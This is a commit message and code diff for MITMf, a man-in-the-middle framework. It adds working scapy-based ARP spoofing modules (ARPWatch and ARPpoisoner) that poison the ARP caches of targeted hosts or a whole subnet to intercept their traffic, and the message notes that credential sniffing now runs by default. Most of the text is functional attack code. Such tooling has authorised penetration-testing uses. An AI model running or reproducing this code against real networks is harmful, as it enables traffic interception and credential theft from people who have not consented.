This is 1/2 of the work done... lot's of cool stuff!

I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds.

- Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all.
- Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code)
- The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2)
- An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as supposed to the one built into Responder, mainly for 2 reasons:
  1) Impacket is moving towards SMB2 support and is actively developed
  2) Impacket's SMB server is fully functional as supposed to Responder's (will be adding a section for it in the config file)
  3) Responder's SMB server was unrealiable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out)

- Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!)
- Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable.
- POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is no use)
- Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out)
- Some plugins are missing because I'm currently re-writing them, will be added later
- Main plugin class now inharates from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/

core/protocols/arp/ARPWatch.py

@@ -0,0 +1,86 @@
+import logging
+import os
+import sys
+import threading
+
+from scapy.all import *
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ARPWatch:
+
+    def __init__(self, gatewayip, myip, interface):
+        self.gatewayip  = gatewayip
+        self.gatewaymac = None
+        self.myip       = myip
+        self.interface  = interface
+        self.debug      = False
+        self.watch      = True
+
+    def start(self):
+        try:
+            self.gatewaymac = getmacbyip(self.gatewayip)
+            if self.gatewaymac is None:
+                sys.exit("[ARPWatch] Error: Could not resolve gateway's MAC address")
+        except Exception, e:
+            sys.exit("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e))
+
+        mitmf_logger.debug("[ARPWatch] gatewayip  => {}".format(self.gatewayip))
+        mitmf_logger.debug("[ARPWatch] gatewaymac => {}".format(self.gatewaymac))
+        mitmf_logger.debug("[ARPWatch] myip       => {}".format(self.myip))
+        mitmf_logger.debug("[ARPWatch] interface  => {}".format(self.interface))
+
+        t = threading.Thread(name='ARPWatch', target=self.startARPWatch)
+        t.setDaemon(True)
+        t.start()
+
+    def stop(self):
+        mitmf_logger.debug("[ARPWatch] shutting down")
+        self.watch = False
+
+    def startARPWatch(self):
+        sniff(prn=self.arp_monitor_callback, filter="arp", store=0)
+
+    def arp_monitor_callback(self, pkt):
+        if self.watch is True: #Prevents sending packets on exiting
+            if ARP in pkt and pkt[ARP].op == 1: #who-has only
+                #broadcast mac is 00:00:00:00:00:00
+                packet = None
+                #print str(pkt[ARP].hwsrc) #mac of sender
+                #print str(pkt[ARP].psrc) #ip of sender
+                #print str(pkt[ARP].hwdst) #mac of destination (often broadcst)
+                #print str(pkt[ARP].pdst) #ip of destination (Who is ...?)
+
+                if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)):
+                    mitmf_logger.debug("[ARPWatch] {} is asking where the Gateway is. Sending reply: I'm the gateway biatch!'".format(pkt[ARP].psrc))
+                    #send repoison packet
+                    packet = ARP()
+                    packet.op = 2
+                    packet.psrc = self.gatewayip
+                    packet.hwdst = str(pkt[ARP].hwsrc)
+                    packet.pdst = str(pkt[ARP].psrc)
+
+                elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)):
+                    mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: I'm {} biatch!".format(pkt[ARP].pdst, pkt[ARP].pdst))
+                    #send repoison packet
+                    packet = ARP()
+                    packet.op = 2
+                    packet.psrc = self.gatewayip
+                    packet.hwdst = '00:00:00:00:00:00'
+                    packet.pdst = str(pkt[ARP].pdst)
+
+                elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)):    
+                    mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: This is the h4xx0r box!".format(pkt[ARP].pdst))
+
+                    packet = ARP()
+                    packet.op = 2
+                    packet.psrc = self.myip
+                    packet.hwdst = str(pkt[ARP].hwsrc)
+                    packet.pdst = str(pkt[ARP].psrc)
+
+                try:
+                    if packet is not None:
+                        send(packet, verbose=self.debug, iface=self.interface)
+                except Exception, e:
+                    mitmf_logger.error("[ARPWatch] Error sending re-poison packet: {}".format(e))
+                    pass

core/protocols/arp/ARPpoisoner.py

@@ -0,0 +1,148 @@
+import logging
+import threading
+from time import sleep
+from scapy.all import *
+
+mitmf_logger = logging.getLogger('mitmf')
+
+class ARPpoisoner():
+
+    def __init__(self, gateway, interface, mac, targets):
+
+        self.gatewayip  = gateway
+        self.gatewaymac = getmacbyip(gateway)
+        self.mymac      = mac
+        self.targets    = self.getTargetRange(targets)
+        self.targetmac  = None
+        self.interface  = interface
+        self.arpmode    = 'rep'
+        self.debug      = False
+        self.send       = True
+        self.interval   = 3
+
+    def getTargetRange(self, targets):
+        if targets is None:
+            return None
+
+        targetList = list()
+        targets = targets.split(",")
+        for target in targets:
+            if "-" in target:
+                max_range = int(target.split("-")[1])
+                octets    = target.split("-")[0].split(".")
+                f3_octets = ".".join(octets[0:3]) 
+                l_octet   = int(octets[3])
+
+                for ip in xrange(l_octet, max_range+1):
+                    targetList.append('{}.{}'.format(f3_octets, ip))
+            else:
+                targetList.append(target)
+
+        return targetList
+
+    def start(self):
+        if self.gatewaymac is None:
+            sys.exit("[ARPpoisoner] Error: Could not resolve gateway's MAC address")
+
+        mitmf_logger.debug("[ARPpoisoner] gatewayip  => {}".format(self.gatewayip))
+        mitmf_logger.debug("[ARPpoisoner] gatewaymac => {}".format(self.gatewaymac))
+        mitmf_logger.debug("[ARPpoisoner] targets    => {}".format(self.targets))
+        mitmf_logger.debug("[ARPpoisoner] targetmac  => {}".format(self.targetmac))
+        mitmf_logger.debug("[ARPpoisoner] mymac      => {}".format(self.mymac))
+        mitmf_logger.debug("[ARPpoisoner] interface  => {}".format(self.interface))
+        mitmf_logger.debug("[ARPpoisoner] arpmode    => {}".format(self.arpmode))
+        mitmf_logger.debug("[ARPpoisoner] interval   => {}".format(self.interval))
+
+        if self.arpmode == 'rep':
+            t = threading.Thread(name='ARPpoisoner-rep', target=self.poisonARPrep)
+
+        elif self.arpmode == 'req':
+            t = threading.Thread(name='ARPpoisoner-req', target=self.poisonARPreq)
+
+        t.setDaemon(True)
+        t.start()
+
+    def stop(self):
+        self.send = False
+        sleep(3)
+        self.interval = 1
+        
+        if self.targets:
+            self.restoreTarget(2)
+
+        elif self.targets is None:
+            self.restoreNet(5)
+
+    def poisonARPrep(self):
+        while self.send:
+            
+            if self.targets is None:
+                pkt = Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op="is-at")
+                sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2
+
+            elif self.targets:
+                #Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it
+                for targetip in self.targets:
+                    try:
+                        targetmac = getmacbyip(targetip)
+
+                        if targetmac is None:
+                            mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
+
+                        elif targetmac:
+                            send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug)
+                            send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug)
+
+                    except Exception, e:
+                        mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
+                        pass
+
+            sleep(self.interval)
+
+    def poisonARPreq(self):
+        while self.send:
+            
+            if self.targets is None:
+                pkt = Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op="who-has")
+                sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2
+
+            elif self.targets:
+                for targetip in self.targets:
+                    try:
+                        targetmac = getmacbyip(targetip)
+                        
+                        if targetmac is None:
+                            mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
+
+                        elif targetmac:
+                            send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug)
+                            send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug)
+
+                    except Exception, e:
+                        mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e))
+                        pass
+            
+            sleep(self.interval)
+
+    def restoreNet(self, count):
+        mitmf_logger.info("[ARPpoisoner] Restoring subnet connection with {} packets".format(count))
+        pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.gatewaymac, psrc=self.gatewayip, op="is-at")
+        sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2
+
+    def restoreTarget(self, count):
+        for targetip in self.targets:
+            try:
+                targetmac = getmacbyip(targetip)
+                
+                if targetmac is None:
+                    mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip))
+
+                elif targetmac:
+                    mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count))
+
+                    send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug)
+                    send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug)
+
+            except Exception, e:
+                mitmf_logger.error("[ARPpoisoner] Exception occurred while restoring connection {}: {}".format(targetip, e))
+                pass